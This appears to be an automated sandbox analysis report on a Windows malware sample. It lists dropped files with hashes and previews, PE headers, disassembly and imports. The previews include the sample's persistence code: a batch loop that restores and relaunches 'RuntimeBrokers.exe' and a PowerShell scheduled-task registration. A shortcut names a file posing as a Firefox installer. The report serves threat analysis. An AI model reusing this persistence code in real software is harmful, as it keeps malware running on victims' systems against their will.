                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):2290968
                                                              Entropy (8bit):6.605466206867334
                                                              Encrypted:false
                                                              SSDEEP:49152:AWc2Dj3hktNUysuFDbfes+p9bZuR6c3ne3EQBSeoyWF2:Vc2Dj3hkHRsuFP2s+pvuR6c3nKEQBSeD
                                                              MD5:DC10EC7E14FF2DE831C6A08BBA41AD88
                                                              SHA1:56B5E56DA9F3346E4AEE57FB3E29286AFA792F0E
                                                              SHA-256:03ED8F64CDCA65B75F8ACC23EBA7CBBDF1BF2B7446159F07A909CE65BDD553EC
                                                              SHA-512:DB3081C52AA19D8E6E873D532D293D34F83B215F930C11A0A8B99A13D0D5D6966D83EAD1D2AC0C8AA1F480BEFC9B6274B9560A30163276AE1FBD8C40862EC117
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 42%
                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....eg...........!.........<.......!.......................................`#...........@............................0.......h..... ..H............"..)... !..0...........................b......P................................................text...m........................... ..`.rdata..._.......`..................@..@.data...@..... ..^..................@....00cfg........ ......N .............@..@.tls.......... ......P .............@....rsrc....H.... ..H...R .............@..@.reloc...0... !..2.... .............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):777816
                                                              Entropy (8bit):6.621348016864403
                                                              Encrypted:false
                                                              SSDEEP:12288:hEj1aAa/zgWDTuE8jegvwIDMuecTenORuFjBw7oHOSgmskduZnTKVrdMujyE3e+0:ooBCoH3BdoTKxdLyAZXdOEvnBzLRUFgi
                                                              MD5:30A274E00DA842B09E9763F19777ADED
                                                              SHA1:848C6A9348020EAEEC1A5674990683A1D9977B80
                                                              SHA-256:9E65D0E8A1BE49EDE20AD53EE1CF57696C99A28D1B058A185818B58B7FD83F66
                                                              SHA-512:81DED3C48D3FFDCF82952922C4B70D5F0945B1B0D5E178A1B552C7D5E8F39D00D3E007D161A7AFBA4502CC5CB2E92DF973902D94C28DF2DE5176FD2F50DE036A
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........a............b......b.......b.................................,.................................................Rich............................PE..L.....Wg.........................................@.................................l.....@..........................................p..0...............X(.......{.. (..p...................0).......(..@............................................text............................... ..`.rdata..............................@..@.data....P.......:..................@....rsrc...0....p.......4..............@..@.reloc...{.......|...:..............@..B................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):788
                                                              Entropy (8bit):5.10946826685498
                                                              Encrypted:false
                                                              SSDEEP:24:NFW/WcuW/WcuWEAzWcyMZKx31SIYaYZLZ6y:NFVcuVcujAzzZKx31SIYN/6y
                                                              MD5:B8422B84DA3F3E791EAB8621899B55D1
                                                              SHA1:0214A135F224C150852D30FE9CA743585C9BB57B
                                                              SHA-256:565D247FC0F778E67EE20EC635E815D19A12DEB5FEFEC94F11274956B44C3627
                                                              SHA-512:D151F620777C5B67056A6CFEE0A88278B2E5FB9AD57DCDD80F2DFF75A801D63EBDDD6D0C74BEDAB8CBF9E8BA152EB7913F2790720AD4B73490ECD250789E7F18
                                                              Malicious:false
                                                              Preview:@echo off..:CheckProcess..set "ProcessName=RuntimeBrokers.exe"..set "ProcessPath=C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe"..set "BackupProcessPath=C:\Users\user\AppData\Local\Temp\\backup.exe"..set "DLLPath=C:\Users\Public\Bilite\Axialis\libcurl.dll"..set "BackupDLLPath=C:\Users\user\AppData\Local\Temp\\backup.dll"..if not exist "%ProcessPath%" (.. echo Process file not found, restoring from backup..... copy /Y "%BackupProcessPath%" "%ProcessPath%"..)..if not exist "%DLLPath%" (.. echo DLL file not found, restoring from backup..... copy /Y "%BackupDLLPath%" "%DLLPath%"..)..tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul..if %ERRORLEVEL% neq 0 (.. start "" "%ProcessPath%"..)..timeout /t 30 /nobreak >nul..goto CheckProcess..
                                                              Process:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):4
                                                              Entropy (8bit):0.8112781244591328
                                                              Encrypted:false
                                                              SSDEEP:3:5d:D
                                                              MD5:24368C745DE15B3D2D6279667DEBCBA3
                                                              SHA1:D0ADCA5766279A11DD1B0B6F88B39503DF90BF5A
                                                              SHA-256:0572F0F48C9D4DA7F59CCFFF270DF8A46297128F367248C5319FFE5B16E2F3AD
                                                              SHA-512:513D1068EF0078AFDE03FE1F3160DC6168C916425C8009235062F708C62152CEDB2FFFB53F82F9E5725443CBBC7DCD1844CF8C7DCE6E259067E8AD41E727CD3B
                                                              Malicious:false
                                                              Preview:8848
                                                              Process:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):151
                                                              Entropy (8bit):4.741657013789009
                                                              Encrypted:false
                                                              SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                              MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                              SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                              SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                              SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                              Malicious:true
                                                              Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName
                                                              Process:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Dec 22 07:44:33 2024, mtime=Sun Dec 22 07:44:36 2024, atime=Tue Dec 3 12:11:47 2024, length=68284584, window=hide
                                                              Category:dropped
                                                              Size (bytes):1106
                                                              Entropy (8bit):4.681658757507972
                                                              Encrypted:false
                                                              SSDEEP:12:82mXu0U4I9/ZcCHqXTIRIGACmqsWw+L7FDtYjA1XJIKGjF0av2kEwhv4t2YCBToo:82m8RMjNfNWwkxDyA15sdv2kEKJTvm
                                                              MD5:666D6D8A8029853F07E16ED005EBEF49
                                                              SHA1:883359574847F56BE6B05BCA420EE6B4F32B4AE7
                                                              SHA-256:A14D7B11A24A37AF7CE3FB67183FECFEDBC5C4948EB1A958E07E31106CA2717F
                                                              SHA-512:642EFE1F6446C5930B461FF0AB879082ED5AB18F940DB624E2C5A302E3772E341B8CC39CE0169E97C343775BC07F06D696EB378E06E1170DCE8906C87137C99B
                                                              Malicious:false
                                                              Preview:L..................F.... ...\.*.MT....>.MT......E...............................P.O. .:i.....+00.../C:\...................x.1....."S...Users.d......OwH.Y.E.....u..............:.......8.U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1......Y.E..Public..f......O.I.Y.E....Du..............<........P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....T.1......Y.E..Bilite..>......Y.E.Y.E....:.....&.................e.B.i.l.i.t.e.......2......Yxi .FIREFO~1.EXE..d......Y.E.Y.E.....Q....................1.).F.i.r.e.f.o.x. .S.e.t.u.p. .1.3.2...0...2...e.x.e......._...............-.......^.............B......C:\Users\Public\Bilite\Firefox Setup 132.0.2.exe..-.....\.....\.P.u.b.l.i.c.\.B.i.l.i.t.e.\.F.i.r.e.f.o.x. .S.e.t.u.p. .1.3.2...0...2...e.x.e..........v..*.cM.jVD.Es.!...`.......X.......609290..............n4UB.. .|..o>.x.....G.P..#.....n4UB.. .|..o>.x.....G.P..#.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2
                                                              Process:C:\Users\user\Desktop\Fqae7BLq4m.exe
                                                              File Type:openssl enc'd data with salted password, base64 encoded
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):5.033214015923012
                                                              Encrypted:false
                                                              SSDEEP:3:iqk4fCxGrMbP0aCVot1SNGuD:ilcCxG+0aCVO1M
                                                              MD5:50E74B5BC067779E678DB0F2A54DEFC8
                                                              SHA1:13EA01C359FCAE743AC3486C6D3A327E56E63807
                                                              SHA-256:2EEF31B0CCD84C6A3385A75DCCF1F5EFB0285621DAAA4CDC08D04158B603DEAA
                                                              SHA-512:6EF7799A0391D8E9BA12BA937C4585C6C8A42A5C62250C5C8F0F6295043E2A3A587EA259A5C51F9CFD2141DA20878FCA8CE2B902F41624BC42C341D81D8AA40E
                                                              Malicious:false
                                                              Preview:U2FsdGVkX19kUlCThJUEb9e23b58qaUiAwjQjHvagtVU8kgm3zdqbwKdbKJmtEKf
                                                              Process:C:\Users\user\Desktop\Fqae7BLq4m.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):777816
                                                              Entropy (8bit):6.621348016864403
                                                              Encrypted:false
                                                              SSDEEP:12288:hEj1aAa/zgWDTuE8jegvwIDMuecTenORuFjBw7oHOSgmskduZnTKVrdMujyE3e+0:ooBCoH3BdoTKxdLyAZXdOEvnBzLRUFgi
                                                              MD5:30A274E00DA842B09E9763F19777ADED
                                                              SHA1:848C6A9348020EAEEC1A5674990683A1D9977B80
                                                              SHA-256:9E65D0E8A1BE49EDE20AD53EE1CF57696C99A28D1B058A185818B58B7FD83F66
                                                              SHA-512:81DED3C48D3FFDCF82952922C4B70D5F0945B1B0D5E178A1B552C7D5E8F39D00D3E007D161A7AFBA4502CC5CB2E92DF973902D94C28DF2DE5176FD2F50DE036A
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........a............b......b.......b.................................,.................................................Rich............................PE..L.....Wg.........................................@.................................l.....@..........................................p..0...............X(.......{.. (..p...................0).......(..@............................................text............................... ..`.rdata..............................@..@.data....P.......:..................@....rsrc...0....p.......4..............@..@.reloc...{.......|...:..............@..B................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\user\Desktop\Fqae7BLq4m.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):2290968
                                                              Entropy (8bit):6.605466206867334
                                                              Encrypted:false
                                                              SSDEEP:49152:AWc2Dj3hktNUysuFDbfes+p9bZuR6c3ne3EQBSeoyWF2:Vc2Dj3hkHRsuFP2s+pvuR6c3nKEQBSeD
                                                              MD5:DC10EC7E14FF2DE831C6A08BBA41AD88
                                                              SHA1:56B5E56DA9F3346E4AEE57FB3E29286AFA792F0E
                                                              SHA-256:03ED8F64CDCA65B75F8ACC23EBA7CBBDF1BF2B7446159F07A909CE65BDD553EC
                                                              SHA-512:DB3081C52AA19D8E6E873D532D293D34F83B215F930C11A0A8B99A13D0D5D6966D83EAD1D2AC0C8AA1F480BEFC9B6274B9560A30163276AE1FBD8C40862EC117
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 42%
                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....eg...........!.........<.......!.......................................`#...........@............................0.......h..... ..H............"..)... !..0...........................b......P................................................text...m........................... ..`.rdata..._.......`..................@..@.data...@..... ..^..................@....00cfg........ ......N .............@..@.tls.......... ......P .............@....rsrc....H.... ..H...R .............@..@.reloc...0... !..2.... .............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\user\Desktop\Fqae7BLq4m.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                              Category:dropped
                                                              Size (bytes):68284584
                                                              Entropy (8bit):7.999992371883463
                                                              Encrypted:true
                                                              SSDEEP:1572864:QHms4Lp3eKMWTi1hdM0C49TEX+tWBrhCJOfH:TNlfD46Xh
                                                              MD5:23F241F690F1F73A272EC524FB0537A7
                                                              SHA1:E9C8177734425D5A5544B6BD6BE6D5B4627E1FE1
                                                              SHA-256:F451E97BF0F25CC841366C190F62C8037577EC2EBC5A67DD524396559134F3B8
                                                              SHA-512:8E574C0069B8D3EBE8E43DFFA3DE6A9BECBFDF3681E88801D93FB81AD623490ECA7852DA933198E40F10BAB9E249D8E3509D0AC505575FC151D768E799F03957
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............`Y.`Y.`YM.nY.`Y&.dY.`Y..?Y.`Y..=Y.`Y.aYb.`Y&.jY.`Y&.kY..`Yv.fY.`YRich.`Y........................PE..L...9m.[.........................@...O...P...`....@..........................`.............................................L[.......`..L...........X...P5..................................................................0.......................UPX0.....@..............................UPX1.........P......................@....rsrc........`......................@..............................................................................................................................................................................................................................................................................................................................................................................................3.95.UPX!....
                                                              Process:C:\Windows\SysWOW64\timeout.exe
                                                              File Type:ASCII text, with CRLF line terminators, with overstriking
                                                              Category:dropped
                                                              Size (bytes):172
                                                              Entropy (8bit):3.8842159555406113
                                                              Encrypted:false
                                                              SSDEEP:3:hYFRZARcWmFsFJQZ/ctXvY/4to/9uF8cttEfYhnQUqg2Htyst3g4t32vov:hYFRamFSQZ0lv5y/9JctESnQUq3tyMXZ
                                                              MD5:B44FC16E07912C24524F74A8D3C9BCED
                                                              SHA1:CCBA90D10D32BFF18221183C88146B378011CC3B
                                                              SHA-256:FA51D90457861D7169034A0D4122B3AFDA2B4C07E157A4C18AF06D833C96ED2A
                                                              SHA-512:1B9F0DD3387FDD1324828AA7CC94A98EC0344A5CAF1EDFFAAF7C0F98F134B09A4DCFD440E9374B0D3C80E099DFE43DABD838B0BE34C395C2F64C9334AE569516
                                                              Malicious:false
                                                              Preview:..Waiting for 30 seconds, press CTRL+C to quit .....29..28..27..26..25..24..23..22..21..20..19..18..17..16..15..14..13..12..11..10.. 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..
                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):7.999987563129512
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:Fqae7BLq4m.exe
                                                              File size:70'322'189 bytes
                                                              MD5:a994f2b3b899758bddf5f35e407a694d
                                                              SHA1:a13dedaceed797a4ee8b399c7db20e88535ab6cc
                                                              SHA256:6c547f7a7e7964a03945cef9bd53e792256e2beb24e15be780714ae349c8a81b
                                                              SHA512:3eb57e03e42b3a0ad54b885f042d70dc2ccd490d493faa0c5f36b5628751d3092ebd986a9ab38e46dd0854257672dddc3bb37a8df4e152776a6306caeabc8d00
                                                              SSDEEP:1572864:T6GU+TLvNqXhlk5jR/7ouTb4CYw1UnxcpMP0s/gH6iERvUUzVwDVuPOtW:Tauehlk/k8ww1UnqpMPHKAUU+gOY
                                                              TLSH:C8F73310E3A057B8F873007D5426CF9BE205ABA757D261637608073B31ADEEFFA065A5
                                                              File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...~.&L.....................N...............0....@..........................................................................P.............................
                                                              Icon Hash:878fd7f3b9353593
                                                              Entrypoint:0x411def
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:
                                                              Time Stamp:0x4C26F87E [Sun Jun 27 07:06:38 2010 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:b5a014d7eeb4c2042897567e1288a095
                                                              Instruction
                                                              push ebp
                                                              mov ebp, esp
                                                              push FFFFFFFFh
                                                              push 00414C50h
                                                              push 00411F80h
                                                              mov eax, dword ptr fs:[00000000h]
                                                              push eax
                                                              mov dword ptr fs:[00000000h], esp
                                                              sub esp, 68h
                                                              push ebx
                                                              push esi
                                                              push edi
                                                              mov dword ptr [ebp-18h], esp
                                                              xor ebx, ebx
                                                              mov dword ptr [ebp-04h], ebx
                                                              push 00000002h
                                                              call dword ptr [00413184h]
                                                              pop ecx
                                                              or dword ptr [00419924h], FFFFFFFFh
                                                              or dword ptr [00419928h], FFFFFFFFh
                                                              call dword ptr [00413188h]
                                                              mov ecx, dword ptr [0041791Ch]
                                                              mov dword ptr [eax], ecx
                                                              call dword ptr [0041318Ch]
                                                              mov ecx, dword ptr [00417918h]
                                                              mov dword ptr [eax], ecx
                                                              mov eax, dword ptr [00413190h]
                                                              mov eax, dword ptr [eax]
                                                              mov dword ptr [00419920h], eax
                                                              call 00007FFA1C99C7C2h
                                                              cmp dword ptr [00417710h], ebx
                                                              jne 00007FFA1C99C6AEh
                                                              push 00411F78h
                                                              call dword ptr [00413194h]
                                                              pop ecx
                                                              call 00007FFA1C99C794h
                                                              push 00417048h
                                                              push 00417044h
                                                              call 00007FFA1C99C77Fh
                                                              mov eax, dword ptr [00417914h]
                                                              mov dword ptr [ebp-6Ch], eax
                                                              lea eax, dword ptr [ebp-6Ch]
                                                              push eax
                                                              push dword ptr [00417910h]
                                                              lea eax, dword ptr [ebp-64h]
                                                              push eax
                                                              lea eax, dword ptr [ebp-70h]
                                                              push eax
                                                              lea eax, dword ptr [ebp-60h]
                                                              push eax
                                                              call dword ptr [0041319Ch]
                                                              push 00417040h
                                                              push 00417000h
                                                              call 00007FFA1C99C74Ch
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x150dc | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1a000 | 0x13c0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x13000 | 0x310 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x11317 | 0x11400 | 797279c5ab1a163aed1f2a528f9fe3ce | False | 0.6174988677536232 | data | 6.576987441854239 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x13000 | 0x30ea | 0x3200 | 1359639b02bcb8f0a8743e6ead1c0030 | False | 0.43828125 | data | 5.549434098115495 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x17000 | 0x292c | 0x800 | 9415c9c8dea3245d6d73c23393e27d8e | False | 0.431640625 | data | 3.6583182363171756 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x1a000 | 0x13c0 | 0x1400 | 5293a0fb2c46166ce21247d17e837639 | False | 0.3568359375 | data | 4.96958597460067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x1a250 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.3709677419354839
RT_ICON | 0x1a538 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.6081081081081081
RT_MENU | 0x1a660 | 0x4a | data | English | United States | 0.8648648648648649
RT_DIALOG | 0x1a6ac | 0xf2 | data | English | United States | 0.7148760330578512
RT_STRING | 0x1a7a0 | 0x40 | data | English | United States | 0.59375
RT_GROUP_ICON | 0x1a7e0 | 0x22 | data | English | United States | 1.0
RT_VERSION | 0x1a804 | 0x314 | data | English | United States | 0.44416243654822335
RT_MANIFEST | 0x1ab18 | 0x60f | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.4229529335912315
RT_MANIFEST | 0x1b128 | 0x298 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4894578313253012
DLL | Import
COMCTL32.dll |
KERNEL32.dll | GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, LoadLibraryA, LockResource, LoadResource, SizeofResource, FindResourceExA, MulDiv, GlobalFree, GlobalAlloc, lstrcmpiA, GetSystemDefaultLCID, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, MultiByteToWideChar, GetLocaleInfoW, lstrlenA, lstrcmpiW, GetEnvironmentVariableW, lstrcmpW, GlobalMemoryStatusEx, VirtualAlloc, WideCharToMultiByte, ExpandEnvironmentStringsW, RemoveDirectoryW, FindClose, FindNextFileW, DeleteFileW, FindFirstFileW, SetThreadLocale, GetLocalTime, GetSystemTimeAsFileTime, lstrlenW, GetTempPathW, SetEnvironmentVariableW, CloseHandle, CreateFileW, GetDriveTypeW, SetCurrentDirectoryW, GetModuleFileNameW, GetCommandLineW, GetVersionExW, CreateEventW, SetEvent, ResetEvent, InitializeCriticalSection, TerminateThread, ResumeThread, SuspendThread, IsBadReadPtr, LocalFree, lstrcpyW, FormatMessageW, GetSystemDirectoryW, DeleteCriticalSection, GetFileSize, SetFilePointer, ReadFile, SetFileTime, SetEndOfFile, EnterCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, GetModuleHandleA, SystemTimeToFileTime, GetLastError, CreateThread, WaitForSingleObject, GetExitCodeThread, Sleep, SetLastError, SetFileAttributesW, GetDiskFreeSpaceExW, lstrcatW, ExitProcess, CompareFileTime, GetStartupInfoA
USER32.dll | CharUpperW, EndDialog, DestroyWindow, KillTimer, ReleaseDC, DispatchMessageW, GetMessageW, SetTimer, CreateWindowExW, ScreenToClient, GetWindowRect, wsprintfW, GetParent, GetSystemMenu, EnableMenuItem, EnableWindow, MessageBeep, LoadIconW, LoadImageW, wvsprintfW, IsWindow, DefWindowProcW, CallWindowProcW, DrawIconEx, DialogBoxIndirectParamW, GetWindow, ClientToScreen, GetDC, DrawTextW, ShowWindow, SystemParametersInfoW, SetFocus, SetWindowLongW, GetSystemMetrics, GetClientRect, GetDlgItem, GetKeyState, MessageBoxA, wsprintfA, SetWindowTextW, GetSysColor, GetWindowTextLengthW, GetWindowTextW, GetClassNameA, GetWindowLongW, GetMenu, SetWindowPos, CopyImage, SendMessageW, GetWindowDC
GDI32.dll | GetCurrentObject, StretchBlt, SetStretchBltMode, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, GetObjectW, GetDeviceCaps, DeleteObject, CreateFontIndirectW, DeleteDC
